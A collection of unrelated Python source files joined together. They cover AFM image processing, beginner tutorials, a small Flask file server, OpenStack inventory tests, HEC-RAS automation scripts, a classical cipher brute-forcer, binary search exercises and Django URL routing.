Cont_Source.set_string_by_name(key+'/title', title+'.'+filename)
gwy.gwy_app_data_browser_copy_channel(Cont_Source, int(ID), Cont_Dest)
print (key, title)
try:
gwy_app_data_browser_remove(Cont_Source)
del Cont_Source
print (gc.collect())
except Exception as ex:
print (ex.args)
try:
mkdir(join(pngexp, root.split('/')[-1]))
except :
pass
meta = open(join(pngexp, root.split('/')[-1])+'/'+'meta_file.txt' , 'a')
#Change Palette, Flatten, Correct line, Remove Scars, Change Scale
DataFields = gwyutils.get_data_fields_dir(Cont_Dest)
for key in DataFields.keys():
ID = key.split('/')[1]
title = Cont_Dest.get_string_by_name(key+"/title")
print (title+'\n')
# Subtract polynomial background
coeffs = DataFields[key].fit_polynom(3, 3)
DataFields[key].subtract_polynom(3, 3, coeffs)
DataFields[key].data_changed()
#Get X Y scale
si = {'x' : 'um' , 'y' : 'um'}
size_x = DataFields[key].get_xreal()*1000000
if (size_x < 1.0):
size_x = size_x * 1000
si['x'] = 'nm'
size_y = DataFields[key].get_yreal()*1000000
if (size_y < 1.0):
size_y = size_y * 1000
si['y'] = 'nm'
scale = str(size_x)+si['x']+'by'+str(size_y)+si['y']
title = title + '_'+ scale
# Line and scar correction (run module functions)
gwy.gwy_app_data_browser_select_data_field(Cont_Dest, int(ID))
gwy.gwy_process_func_run("line_correct_median", Cont_Dest, gwy.RUN_IMMEDIATE)
gwy.gwy_process_func_run("scars_remove", Cont_Dest, gwy.RUN_IMMEDIATE)
gwy.gwy_process_func_run("fix_zero", Cont_Dest, gwy.RUN_IMMEDIATE)
#Get Color Type
colorr = Cont_Dest.get_int32_by_name('/'+ID+'/base/range-type')
#Change_Color Palette
Cont_Dest.set_string_by_name('/'+ID+'/base/palette', 'Gold')
#Get Height Distribution and get Percentile color set range
#Get CDH
histogram = gwy.DataLine(1, 1, False)
DataFields[key].dh(histogram, 512)
median = histogram.get_max()
data = histogram.get_data()
ind_med = [i for i,v in enumerate(data) if data[i] == median][0]
#Get Percentile Range
cumhistogram = gwy.DataLine(1, 1, False)
DataFields[key].cdh(cumhistogram, 512)
data = cumhistogram.get_data()
Data_Range = DataFields[key].get_min_max()
Hist_pct = [0, 0]
Hist_pct[0] = [float(index)/512 for index in range(ind_med, 0, -1) if (data[index] >= ratio[0] and data[index-1] <= ratio[0])][0]
Hist_pct[1] = [float(index)/512 for index in range(ind_med, 512, 1) if (data[index] <= ratio[1] and data[index+1] >= ratio[1])][0]
Range = Data_Range[1]-Data_Range[0]
Color_Range = {'min': Data_Range[0]+Range*Hist_pct[0], 'max':Data_Range[0]+Range*Hist_pct[1]}
Cont_Dest.set_boolean_by_name('/'+ID+'/data/visible', 1)
Cont_Dest.set_int32_by_name('/'+ID+'/base/range-type' , 1)
Cont_Dest.set_double_by_name('/'+ID+'/base/min', Color_Range['min'])
Cont_Dest.set_double_by_name('/'+ID+'/base/max', Color_Range['max'])
meta.write('Filename : '+ cwd+ '/' +str(title.split('Height.')[1])+'\n')
meta.write('ColorRange : '+'{min : \t%e,\t max : \t%e }\n' %(Color_Range['min'] ,Color_Range['max']))
#Change Color Range into (Full:0, Manual:1, Auto:2, Adaptive:3)
#Cont_Dest.set_int32_by_name('/'+ID+'/base/range-type', 2)
print (title)
gwy.gwy_file_save(Cont_Dest, join(pngexp, root.split('/')[-1])+ '/' +str(title)+'%d.png' % int(ID), gwy.RUN_NONINTERACTIVE)
Cont_Dest.set_boolean_by_name('/'+ID+'/data/visible', 0)
try:
gwy.gwy_file_save(Cont_Dest,join(cwd, 'Processed')+'/'+root.split('/')[-1]+pdr+'.gwy', gwy.RUN_NONINTERACTIVE)
except Exception as ex:
print(ex.args)
gwy_app_data_browser_remove(Cont_Dest)
del Cont_Dest
print (gc.collect())
meta.close()
def scan_dir_runbatch(root, cwd, pdr, pngexp, ratio):
#####Go into the deepest folder
dirs = [ f for f in listdir(cwd) if isdir(join(cwd,f)) ]
try:
dirs.remove('Processed')
except :
pass
#dirs = {'./' : Files}
for dr in dirs:
scan_dir_runbatch(root, join(cwd, dr), dr, pngexp, ratio)
runbatch(root, cwd, pdr, pngexp, ratio)
##########Get list of sub directories and run recursive self function
#custgwy.sep_files(root, cwd, 'DDX - postexp')
scan_dir_runbatch(root, cwd, cwd.split('/')[-1], pngexp, ratio)
|
"""
元组:与列表类似,但是元组的元素不能被修改。
在多线程环境下可以规避线程安全的问题。元组在创建时间和空间占用都优于列表。
"""
def main():
# 定义元组
yz = ('wangfeng', 22, '162cm', '四川省南部县')
print(yz)
# 获取元组中的元素
print(yz[0])
print(yz[1])
# 遍历
for x in yz:
print(x)
# 尝试修改元组的元素
# yz[0] = 'bool' TypeError
# 对引用yz重新赋值后原来的元组将被垃圾回收
yz = ('bool', 25, '162cm', '四川省南部县')
print(yz)
# 将元祖转换成列表
person = list(yz)
# 修改列表元素
person[0] = 'wangfeng'
print(person)
# 将列表转换成元组
yz = tuple(person)
print(yz)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""
Faça um Programa que peça a temperatura em graus Celsius,
transforme e mostre em graus Farenheit.
"""
celsius = float(input("Informe a temperatura em Celsius: "))
print(f"{celsius}ºC equivalem a {(celsius * 9/5) + 32}ºF")
|
import re
import sys
from flask import Flask, make_response
app = Flask(__name__)
app.config['JSONIFY_PRETTYPRINT_REGULAR'] = True
# the default page that is displayed
# when url is not provided
@app.route('/')
def default():
try:
# opens the index.html file in the current directory
with open('index.htm') as file:
file_display = file.read()
return make_response(file_display, 200)
except IOError:
print ("Error: File does not appear to exist.")
return make_response("that page does not exist", 404)
# catches all urls that are provided
@app.route('/<path:url>')
def getAll(url):
# regex to mactch if the query
index_match = '^((\/.*)*.html)|((\/.*)*.htm)$'
url_matched = re.match(index_match,'/'+url)
if url_matched == None:
# if the path entered is not valid
return make_response("bad request", 400)
else:
# if the path entered is valid
try:
# opens the file that is provided in the url
with open(url) as file:
file_display = file.read()
return make_response(file_display, 200)
except IOError:
# returns page doesnt exists if the url has a
# non existing file path
return make_response("that page does not exist", 404)
if __name__ == '__main__':
# port number defaults to 8080 if one is not
# provided through the command line
port = len(sys.argv) > 1 and sys.argv[1] or 8080
app.run(port=port) |
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import yaml
from bifrost.tests import base
from bifrost.tests import utils
class TestBifrostInventoryFunctional(base.TestCase):
def setUp(self):
self.maxDiff = None
super(TestBifrostInventoryFunctional, self).setUp()
def test_yaml_to_json_conversion(self):
# Note(TheJulia) Ultimately this is just ensuring
# that we get the same output when we pass something
# in as YAML
expected_hostvars = """{"hostname1":
{"uuid": "00000000-0000-0000-0000-000000000002", "driver": "ipmi",
"name": "hostname1", "ipv4_address": "192.168.1.3", "ansible_ssh_host":
"192.168.1.3", "provisioning_ipv4_address": "192.168.1.3",
"driver_info": {"ipmi_address": "192.0.2.3",
"ipmi_password": "undefined", "ipmi_username": "root",
"ipmi_target_address": null, "ipmi_target_channel": null,
"ipmi_transit_address": null, "ipmi_transit_channel": null}, "nics":
[{"mac": "00:01:02:03:04:06"}], "properties": {"ram": "8192", "cpu_arch":
"x86_64", "disk_size": "1024", "cpus": "2"}, "host_groups":
["baremetal", "nova"]}, "hostname0":
{"uuid": "00000000-0000-0000-0000-000000000001", "driver": "ipmi",
"name": "hostname0", "ipv4_address": "192.168.1.2", "ansible_ssh_host":
"192.168.1.2", "provisioning_ipv4_address": "192.168.1.2",
"driver_info": {}, "nics":
[{"mac": "00:01:02:03:04:05"}], "properties": {"ram": "8192",
"cpu_arch": "x86_64", "disk_size": "512", "cpus": "1"},
"host_groups": ["baremetal", "nova"]}}""".replace('\n', '')
(groups, hostvars) = utils.bifrost_data_conversion(
yaml.safe_dump(json.loads(str(expected_hostvars))))
del hostvars['127.0.0.1']
self.assertDictEqual(json.loads(str(expected_hostvars)), hostvars)
def test_minimal_json(self):
input_json = """{"h0000-01":{"uuid":
"00000000-0000-0000-0001-bad00000010","name":"h0000-01","driver_info"
:{"ipmi_address":"10.0.0.78","ipmi_username":"ADMIN","
ipmi_password":"ADMIN"},"driver":"ipmi"}}""".replace('\n', '')
expected_json = """{"h0000-01":{"uuid":
"00000000-0000-0000-0001-bad00000010","name":"h0000-01","driver_info"
:{"ipmi_address":"10.0.0.78","ipmi_username":"ADMIN","
ipmi_password":"ADMIN"},"driver":"ipmi","addressing_mode":
"dhcp","host_groups": ["baremetal"]}}""".replace('\n', '')
(groups, hostvars) = utils.bifrost_data_conversion(input_json)
del hostvars['127.0.0.1']
self.assertDictEqual(json.loads(str(expected_json)), hostvars)
|
# -*- coding: utf-8 -*-
"""
"""
import datetime as dt
import time
from pyras.controllers import RAS500, RAS41, kill_ras
from pyras.controllers.hecras import ras_constants as RC
#project = r'temp_examples\Steady Examples\BEAVCREK.prj'
#project = r'temp_examples\Unsteady Examples\NavigationDam\ROCK_TEST.prj'
#project = r'D:\Users\penac1\Dropbox (Personal)\it\repos\git\pyras\temp\Unsteady Examples\BEAV_STO_PROBLEM.prj'
#project = r'D:\Users\penac1\Dropbox (Personal)\it\repos\git\pyras\temp_examples\Unsteady Examples\BaldLatWeir.prj'
#project = r'D:\Users\penac1\Dropbox (Personal)\it\repos\git\pyras\temp_examples\Steady Examples\BEAVCREK.prj'
#
##with RAS500(project) as rc:
## res = rc.Project_Current()
## print(rc.version())
## print('Project_Current:')
## print(res)
## print('')
## for m in sorted(dir(rc)):
## print(m)
## rc.pause(10)
#
#rc = RAS41()
#rc.ShowRas()
#rc.Project_Open(project)
#
# %% Curent (Controller Class)
#res = rc.CurrentGeomFile()
#print('CurrentGeomFile')
#print(res)
#print('')
#
#res = rc.CurrentPlanFile()
#print('CurrentPlanFile')
#print(res)
#print('')
#
#res = rc.CurrentProjectFile()
#print('CurrentProjectFile')
#print(res)
#print('')
#
#res = rc.CurrentProjectTitle()
#print('CurrentProjectTitle')
#print(res)
#print('')
#
#res = rc.CurrentSteadyFile()
#print('CurrentSteadyFile')
#print(res)
#print('')
#
#res = rc.CurrentUnSteadyFile()
#print('CurrentUnSteadyFile')
#print(res)
#print('')
# %% Geometry (Geometry Class)
#geo = rc.Geometry()
#
#res = geo.RiverIndex('Beaver Creek')
#print('RiverIndex')
#print(res)
#print('')
#
#res = geo.RiverName(1)
#print('RiverName')
#print(res)
#print('')
#
#res = geo.ReachName(1, 1)
#print('ReachName')
#print(res)
#print('')
#
#res = geo.ReachInvert_nPoints(1, 1)
#print('ReachInvert_nPoints')
#print(res)
#print('')
#
#res = geo.ReachInvert_Points(1, 1)
#print('ReachInvert_Points')
#print(res)
#print('')
#
#res = geo.ReachIndex(1, 'Kentwood')
#print('ReachIndex')
#print(res)
#print('')
#
#res = geo.nRiver()
#print('nRiver')
#print(res)
#print('')
#
#res = geo.nReach(1)
#print('nReach')
#print(res)
#print('')
#
#res = geo.NodeType(1, 1, 1)
#print('NodeType')
#print(res)
#print('')
#
#res = geo.NodeRS(1, 1, 1)
#print('NodeRS')
#print(res)
#print('')
#
#res = geo.NodeIndex(1, 1, '5.99')
#print('NodeIndex')
#print(res)
#print('')
#
#res = geo.NodeCutLine_Points(1, 1, 1)
#print('NodeCutLine_Points')
#print(res)
#print('')
#
#res = geo.NodeCutLine_nPoints(1, 1, 1)
#print('NodeCutLine_nPoints')
#print(res)
#print('')
#
#res = geo.NodeCType(1, 1, 8)
#print('NodeCType')
#print(res)
#print('')
#%% Edit Add (Controller Class)
#res = rc.Edit_AddBC('Beaver Creek', 'Kentwood', '5.691')
#print('Edit_AddBC')
#print(res)
#print('')
#
#res = rc.Edit_AddIW('Beaver Creek', 'Kentwood', '5.692')
#print('Edit_AddIW')
#print(res)
#print('')
#
#res = rc.Edit_AddLW('Beaver Creek', 'Kentwood', '5.693')
#print('Edit_AddLW')
#print(res)
#print('')
#
#res = rc.Edit_AddXS('Beaver Creek', 'Kentwood', '5.694')
#print('Edit_AddXS')
#print(res)
#print('')
# %% Edit (Controller Class)
#rc.Edit_BC('Beaver Creek', 'Kentwood', '5.99')
#print('Edit_BC')
#print('')
#
#rc.Edit_GeometricData()
#print('Edit_GeometricData')
#print('')
#
#rc.Edit_IW('Beaver Creek', 'Kentwood', '5.99')
#print('Edit_IW')
#print('')
#
#rc.Edit_LW('Beaver Creek', 'Kentwood', '5.99')
#print('Edit_LW')
#print('')
#
#rc.Edit_MultipleRun()
#print('Edit_MultipleRun')
#print('')
#
#rc.Edit_PlanData()
#print('Edit_PlanData')
#print('')
#
#rc.Edit_QuasiUnsteadyFlowData()
#print('Edit_QuasiUnsteadyFlowData')
#print('')
#
#rc.Edit_SedimentData()
#print('Edit_SedimentData')
#print('')
#
#rc.Edit_SteadyFlowData()
#print('Edit_SteadyFlowData')
#print('')
#
#rc.Edit_UnsteadyFlowData()
#print('Edit_UnsteadyFlowData')
#print('')
#
#rc.Edit_WaterQualityData()
#print('Edit_WaterQualityData')
#print('')
#
#rc.Edit_XS('Beaver Creek', 'Kentwood', '5.99')
#print('Edit_XS')
#print('')
# %% Geometry (Controller Class)
#res = rc.ExportGIS()
#print('ExportGIS')
#print(res)
#print('')
# Not tested
#res = rc.Geometery_GISImport(self, title, Filename)
#print('Geometery_GISImport')
#print(res)
#print('')
# Not tested but seems to work
#res = rc.Geometry_GetGateNames(1, 1, '5.39')
#print('Geometry_GetGateNames')
#print(res)
#print('')
# Not working
#res = rc.Geometry_GetGML('Bvr.Cr.+Bridge - P/W: New Le, Lc')
#print('Geometry_GetGML')
#print(res)
#print('')
#res = rc.Geometry_GetNode(1, 1, '5.39')
#print('Geometry_GetNode')
#print(res)
#print('')
#
#res = rc.Geometry_GetNodes(1, 1)
#print('Geometry_GetNodes')
#print(res)
#print('')
#
#res = rc.Geometry_GetReaches(1)
#print('Geometry_GetReaches')
#print(res)
#print('')
#
#res = rc.Geometry_GetRivers()
#print('Geometry_GetRivers')
#print(res)
#print('')
#
#res = rc.Geometry_SetMann('Beaver Creek', 'Kentwood', '5.99',
# 3, (0.12, 0.13, 0.14), (5, 36, 131))
#print('Geometry_SetMann')
#print(res)
#print('')
#
#res = rc.Geometry_SetMann_LChR('Beaver Creek', 'Kentwood', '5.99', 0.15, 0.10,
# 0.16)
#print('Geometry_SetMann_LChR')
#print(res)
#print('')
#
#res = rc.Geometry_SetSAArea('test', 1200)
#print('Geometry_SetSAArea')
#print(res)
#print('')
# %% Get (Controller Class)
#res = rc.GetRASVersion()
#print('GetRASVersion')
#print(res)
#print('')
#
#res = rc.HECRASVersion()
#print('HECRASVersion', res)
#print(res)
#print('')
# %% Output
#river = 1
#reach = 1
#n = 1
#station = '135068.7'
#res = rc.Output_ComputationLevel_Export('export_test2.txt')
#print('Output_ComputationLevel_Export', res)
#print('')
#
#res = rc.Output_GetNode(river, reach, station)
#print('Output_GetNode', res)
#print('')
#
#res = rc.Output_GetNodes(river, reach)
#print('Output_GetNodes', res)
#print('')
#res = rc.Output_GetProfiles()
#print('Output_GetProfiles', res)
#print('')
#reach = 'Loc Hav'
#res = rc.Output_GetReach(river, reach)
#print('Output_GetReach', res)
#print('')
#res = rc.Output_GetReaches(river)
#print('Output_GetReaches', res)
#print('')
#river_name = 'Bald Eagle'
#res = rc.Output_GetRiver(river_name)
#print('Output_GetRiver', res)
#print('')
#res = rc.Output_GetRivers()
#print('Output_GetRivers', res)
#print('')
#updn = 0
#prof = 1
#nVar = RC.WS_ELEVATION
#res = rc.Output_NodeOutput(river, reach, n, updn, prof, nVar)
#print('Output_NodeOutput', res)
#print('')
#riv_id = 1
#rch = 1
#prof = 1
#nVar = RC.PROFILE
#res = rc.Output_ReachOutput(riv_id, rch, prof, nVar)
#print('Output_ReachOutput', res)
#print('')
#res = rc.Output_Variables()
#print('Output_Variables', res)
#print('')
#riv = 1
#rch = 1
#n = 1
#updn = 1
#prof = 1
#res = rc.Output_VelDist(riv, rch, n, updn, prof)
#print('Output_Output_VelDist', res)
#print('')
#riv = 'Bald Eagle'
#rch = 'Loc Hav'
#rs = '138154.4'
#res = rc.OutputDSS_GetStageFlow(riv, rch, rs)
#print('OutputDSS_GetStageFlow', res)
#print('')
#res = rc.OutputDSS_GetStageFlowSA('Lower SA')
#print('OutputDSS_GetStageFlowSA', res)
#print('')
# %% Plan
#plan = 'Unsteady with Bridges, Dam, later weirs/'
#res = rc.Plan_GetFilename(plan)
#print('Plan_GetFilename', res)
#print('')
#res = rc.Plan_Names(False)
#print('Plan_Names', res)
#print('')
#res = rc.Plan_Reports()
#print('Plan_Reports', res)
#print('')
#plan = 'Unsteady with Bridges, Dam, later weirs/'
#res = rc.Plan_SetCurrent(plan)
#print('Plan_SetCurrent', res)
#print('')
#plan = 'Unsteady with Bridges, Dam, later weirs/'
#show_message = False
#res = rc.PlanOutput_IsCurrent(plan, show_message)
#print('PlanOutput_IsCurrent', res)
#print('')
#plan = 'Unsteady with Bridges, Dam, later weirs/'
#res = rc.PlanOutput_SetCurrent(plan)
#print('PlanOutput_SetCurrent', res)
#print('')
#plan = 'Unsteady with Bridges, Dam, later weirs/'
#res = rc.PlanOutput_SetMultiple(1, [plan], False)
#print('PlanOutput_SetMultiple', res)
#print('')
# %% Plot
riv = 'Bald Eagle'
rch = 'Loc Hav'
rs = '138154.4'
sa = ' Upper SA'
#rc.PlotHydraulicTables('Beaver Creek', 'Kentwood', '5.99')
#print('PlotHydraulicTables')
#print('')
#rc.PlotPF('Bald Eagle', 'Loc Hav')
#print('PlotPF')
#print('')
#rc.PlotPFGeneral('Bald Eagle', 'Loc Hav')
#print('PlotPFGeneral')
#print('')
#rc.PlotRatingCurve(riv, rch, rs)
#print('PlotRatingCurve')
#print('')
#rc.PlotStageFlow(riv, rch, rs)
#print('PlotStageFlow')
#print('')
#rc.PlotStageFlow_SA(sa)
#print('PlotStageFlow_SA')
#print('')
#rc.PlotXS(riv, rch, rs)
#print('PlotXS')
#print('')
#rc.PlotXYZ(riv, rch)
#print('PlotXYZ')
#print('')
# %% Project (Controller Class)
#res = rc.Project_Current()
#print('Project_Current:')
#print(res)
#print('')
#title = 'Test'
#path = r'd:\test\file.prj'
#rc.Project_New(title, path)
#print('Project_New:')
#print('')
#path = r'd:\test1\copy.prj'
#rc.Project_SaveAs(path)
#print('Project_SaveAs:')
#print('')
#rc.Compute_HideComputationWindow()
#rc.Compute_ShowComputationWindow()
#res = rc.Compute_CurrentPlan()
#print('Compute_CurrentPlan:')
#print(res)
#print('')
#res = rc.Compute_Cancel()
#print('\nCompute_Cancel', res)
#res = rc.Compute_Complete()
#print('Compute_Complete')
#print(res)
#print('')
# %% Schematic (Controller Class)
#res = rc.Schematic_ReachCount()
#print('Schematic_ReachCount')
#print(res)
#print('')
#
#res = rc.Schematic_ReachPointCount()
#print('Schematic_ReachPointCount')
#print(res)
#print('')
#
#res = rc.Schematic_ReachPoints()
#print('Schematic_ReachPoints')
#print(res)
#print('')
#
#res = rc.Schematic_XSCount()
#print('Schematic_XSCount')
#print(res)
#print('')
#
#res = rc.Schematic_XSPointCount()
#print('Schematic_XSPointCount')
#print(res)
#print('')
#
#res = rc.Schematic_XSPoints()
#print('Schematic_XSPointCount')
#print(res)
#print('')
# %% Steady
#project = r'D:\Users\penac1\Dropbox (Personal)\it\repos\git\pyras\temp_examples\Steady Examples\BEAVCREK.prj'
#rc = RAS500()
#rc.ShowRas()
#rc.Project_Open(project)
#res = rc.SteadyFlow_ClearFlowData()
#print('SteadyFlow_ClearFlowData')
#river = 'Beaver Creek'
#reach = 'Kentwood'
#downstream = True
#ws = [210,211, 215]
#res = rc.SteadyFlow_FixedWSBoundary(river, reach, downstream , ws)
#print('SteadyFlow_FixedWSBoundary')
#res = rc.SteadyFlow_nProfile()
#print('SteadyFlow_nProfile', res)
#river = 'Beaver Creek'
#reach = 'Kentwood'
#rs = '5.99'
#flow = [5001, 10001, 14001]
#res = rc.SteadyFlow_SetFlow(river, reach, rs, flow)
#print('SteadyFlow_SetFlow', res)
# %% Table
project = r'D:\Users\penac1\Dropbox (Personal)\it\repos\git\pyras\temp_examples\Steady Examples\BEAVCREK.prj'
rc = RAS500()
rc.ShowRas()
rc.Project_Open(project)
#river = 'Beaver Creek'
#reach = 'Kentwood'
#rc.TablePF(river, reach)
#print('TablePF')
river = 'Beaver Creek'
reach = 'Kentwood'
rs = '5.99'
rc.TableXS(river, reach, rs)
print('TableXS')
time.sleep(3)
rc.close()
kill_ras()
|
import itertools
import string
import enchant
import sys
if len(sys.argv) >= 2:
alphabets = list(string.uppercase for i in range(6))
d = enchant.Dict("en_US")
file1 = open(sys.argv[1], 'r')
file1 = file1.read(6)
file2 = open(sys.argv[2], 'r')
file2 = file2.read(6)
for a in itertools.product(*alphabets):
scheck1 = ''.join(list(chr(((ord(file1[n]) - ord(a[n])) % 26) + 65) for n in range(6)))
scheck2 = ''.join(list(chr(((ord(file2[n]) - ord(a[n])) % 26) + 65) for n in range(6)))
for n in range(5):
if d.check(scheck1):
print("----------file1-------------\nKey: " + ''.join(a) + " Output: "+ scheck1 + "\n----------------------------\n")
if d.check(scheck2):
print("----------file2-------------\nKey: " + ''.join(a) + " Output: "+ scheck2 + "\n----------------------------\n")
scheck1 = scheck1[:(len(scheck1)-1)]
scheck2 = scheck2[:(len(scheck2)-1)]
else:
print('Usage: ' + sys.argv[0] + ' file1 file2')
|
from django.apps import AppConfig
class ViewsetUrlRouteConfig(AppConfig):
name = 'Viewset_url_route'
|
from synthetic_galaxy import synthetic_galaxy
from error_with_jitter import error_with_jitter
from machine_error import machine_error
from binary_fraction import binary_fraction
def synthetic_fractions(num_of_galaxies, cloud, bf, m_min, mu, sigma, a, b):
"""Makes a list of detection rates from synthetic simulated galaxies
Inputs
----------
num_of_galaxies: How many synthetic galaxies you want to make
cloud: Astropy table object. The table is used as a basis for making the synthetic galaxies. Should
have been made through the DataSimp process.
bf: Desired binary fraction that you want in the synthetic galaxy. Should be a number between [0,1]
m_min: Minimum mass you want to consider for a secondary object. Needs to have astropy units
of .JupyterMass
mu: Mean value used in making the period distribution for binary orbits
sigma: Standard deviation for the period distribution for the binary orbits
a: Jitter parameter, y-intercept for the line in log space
b: Jitter parameter, slope for the line in log space.
Output
----------
syn_fraction: List of detection rates for each synthetic galaxy made. Has len = num_of_galaxies
"""
# Counting variable
galaxy_count = 0
# Empty list used to store the final answers.
syn_fractions = []
while galaxy_count < num_of_galaxies:
# Makes a list of synthetic radial velocity and error observations.
rv_syn, err_syn = synthetic_galaxy(cloud, bf, m_min, mu, sigma)
# Adds the extra jitter to the errors
err_syn_j = error_with_jitter(err_syn, a, b, cloud['LOGG'])
# Makes the rv values deviate from the exact values, using the error with jitter
rv_syn_j = machine_error(rv_syn, err_syn_j)
# Finds the detection rate for the synthetic radial velocity and error values.
syn_fraction_j = binary_fraction(rv_syn_j, err_syn_j)
# Append the list we return
syn_fractions.append(syn_fraction_j)
# Increase the counting variable by one
galaxy_count += 1
return syn_fractions
|
from image_processing import ImageProcessing
import numpy as np
import os
import utils
img_prc = ImageProcessing()
wally_testdir = './wally_raspCam'
imgs_coords = img_prc.generate_cropped_imgs(wally_testdir , 24,24,48,48)
for key in imgs_coords:
imgs , coord =imgs_coords[key]
np.save(file = os.path.join(wally_testdir , key.replace('.jpg' , '.npy')), arr = imgs )
|
def binary_search_1(alist, item):
"""二分查找,递归版本"""
n = len(alist)
if n > 0:
mid = n // 2
if alist[mid] == item:
return True
elif item < alist[mid]:
return binary_search_1(alist[:mid], item)
else:
return binary_search_1(alist[mid + 1:], item)
return False
def binary_search_2(alist, item):
"""二分查找,指针版本"""
first = 0
last = len(alist) - 1
while first <= last:
mid = (first + last) // 2
if alist[mid] == item:
return mid
elif item < alist[mid]:
last = mid - 1
else:
first = mid + 1
return -1
def array_binary_search(nums,target):
def find_idx(l,r):
mid = (r - l) // 2 + l
tmp = nums[mid]
# if nums[l]>nums[r]:
# 二分搜索变形之:查找升序数组中target第一次出现和最后一次出现时的索引位置
def test01(nums,target):
def search_lower_bound(alist, item):
l = 0
r = len(alist) - 1
while l <= r:
mid = l +( r-l) // 2
if alist[mid] == item and (mid==0 or alist[mid-1]<item):
return mid
elif alist[mid] >= item:
r = mid - 1
else:
l = mid + 1
return -1
def search_upper_bound(alist, item):
l = 0
r = len(alist) - 1
while l <= r:
mid = l + (r - l) // 2
if alist[mid] == item and (mid==len(alist)-1 or alist[mid+1]>item):
return mid
elif alist[mid] <= item:
l = mid + 1
else:
r = mid - 1
return -1
a = search_lower_bound(nums,target)
b = search_upper_bound(nums,target)
return [a,b]
# 二分搜索变形之:查找第一个大于target的位置
def test02(nums,target):
def search_one(alist, item):
l = 0
r = len(alist) - 1
while l <= r:
mid = l +( r-l) // 2
if alist[mid] > item and (mid==0 or alist[mid-1]<=item):
return mid
elif alist[mid] < item:
l = mid + 1
elif alist[mid] > item:
r = mid - 1
elif alist[mid] == item:
l = mid + 1
return -1
return search_one(nums,target)
# 二分搜索变形之:查找target在升序变形数组中的位置
def test03(nums,target):
def search_one(nums, target):
l = 0
r = len(nums) - 1
while l <= r:
mid = l +(r-l) // 2
if nums[mid] == target:
return mid
if nums[mid] >= nums[l]:
if nums[mid]>target>=nums[l]:
r = mid -1
else:
l = mid + 1
else:
if nums[mid]<target<=nums[r]:
l = mid + 1
else:
r = mid - 1
return -1
return search_one(nums,target)
if __name__ == '__main__':
li = [65,78,98,1,2,3,6]
print(test03(li,3)) |
#! /usr/bin/env python
#
def simplex_grid_index_next ( m, n, g ):
#*****************************************************************************80
#
## SIMPLEX_GRID_INDEX_NEXT returns the next simplex grid index.
#
# Discussion:
#
# The vector G has dimension M+1. The first M entries may be regarded
# as grid coordinates. These coordinates must have a sum between 0 and N.
# The M+1 entry contains the remainder, that is N minus the sum of the
# first M coordinates.
#
# Each time the function is called, it is given a current grid index, and
# computes the next one. The very first index is all zero except for a
# final value of N, and the very last index has all zero except for an'
# intial value of N.
#
# For example, here are the coordinates in order for M = 3, N = 3:
#
# 0 0 0 0 3
# 1 0 0 1 2
# 2 0 0 2 1
# 3 0 0 3 0
# 4 0 1 0 2
# 5 0 1 1 1
# 6 0 1 2 0
# 7 0 2 0 1
# 8 0 2 1 0
# 9 0 3 0 0
# 10 1 0 0 2
# 11 1 0 1 1
# 12 1 0 2 0
# 13 1 1 0 1
# 14 1 1 1 0
# 15 1 2 0 0
# 16 2 0 0 1
# 17 2 0 1 0
# 18 2 1 0 0
# 19 3 0 0 0
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 21 April 2015
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# Input, integer M, the spatial dimension.
#
# Input, integer N, the number of subintervals.
#
# Input/output, integer G(M+1), the current, and then the next, grid index.
#
from comp_next_grlex import comp_next_grlex
g = comp_next_grlex ( m + 1, g )
return g
def simplex_grid_index_next_test ( ):
#*****************************************************************************80
#
## SIMPLEX_GRID_INDEX_NEXT_TEST tests SIMPLEX_GRID_INDEX_NEXT.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 21 April 2015
#
# Author:
#
# John Burkardt
#
import numpy as np
print ''
print 'SIMPLEX_GRID_INDEX_NEXT_TEST:'
print ' SIMPLEX_GRID_INDEX_NEXT lists, one by one, the indices'
print ' of a simplex grid that uses N+1 points on a side,'
print ' in an M-dimensional simplex.'
print ''
print ' #: 1 2 3 (*)'
print ''
m = 3
n = 3
j = 0
g = np.zeros ( m + 1 )
g[m] = n
while ( True ):
print ' %2d:' % ( j ),
for i in range ( 0, m ):
print ' %2d' % ( g[i] ),
print ' (%2d)' % ( g[m] )
if ( g[0] == n ):
break
g = simplex_grid_index_next ( m, n, g )
j = j + 1
#
# Terminate.
#
print ''
print 'SIMPLEX_GRID_INDEX_NEXT_TEST:'
print ' Normal end of execution.'
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
simplex_grid_index_next_test ( )
timestamp ( )
|
from rest_framework import routers
from .views import CardsViewSet
router = routers.SimpleRouter()
router.register('', CardsViewSet)
urlpatterns = router.urls
|
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from django.views.generic.base import RedirectView
from . import views
app_name = 'campaign'
urlpatterns = [
path('', views.list_bookmarks, name='list_bookmarks'),
path('thing/<name>', views.detail, name='detail'),
path('search', views.search, name='search'),
path('export', views.export, name='export'),
path('import', views.import_campaign, name='import'),
path('import_settings', views.import_settings, name='import_settings'),
path('export_settings', views.export_settings, name='export_settings'),
path('list/<thing_type>', views.list_all, name='list'),
path('new/<thing_type>', views.new_thing, name='new_thing'),
path('delete/<name>', views.delete_thing, name='delete_thing'),
path('add_link/<name>', views.add_link, name='add_link'),
path('edit_encounters/<name>/<type_name>', views.edit_random_encounters, name='edit_encounters'),
path('edit_description/<name>', views.edit_description, name='edit_description'),
path('edit_name/<name>', views.edit_name, name='edit_name'),
path('edit_image/<name>', views.edit_image, name='edit_image'),
path('randomize_name/<thing_type_name>/<name>', views.randomize_name, name='randomize_name'),
path('change_campaign/<name>', views.change_campaign, name='change_campaign'),
path('set_attribute/<name>/<attribute_name>', views.set_attribute, name='set_attribute'),
path('remove_link/<name>/<link_name>', views.remove_link, name='remove_link'),
path('change_parent/<thing_type_name>/<name>', views.change_parent, name='change_parent'),
path('change_thing_type/<name>/<thing_type_name>', views.change_thing_type, name='change_thing_type'),
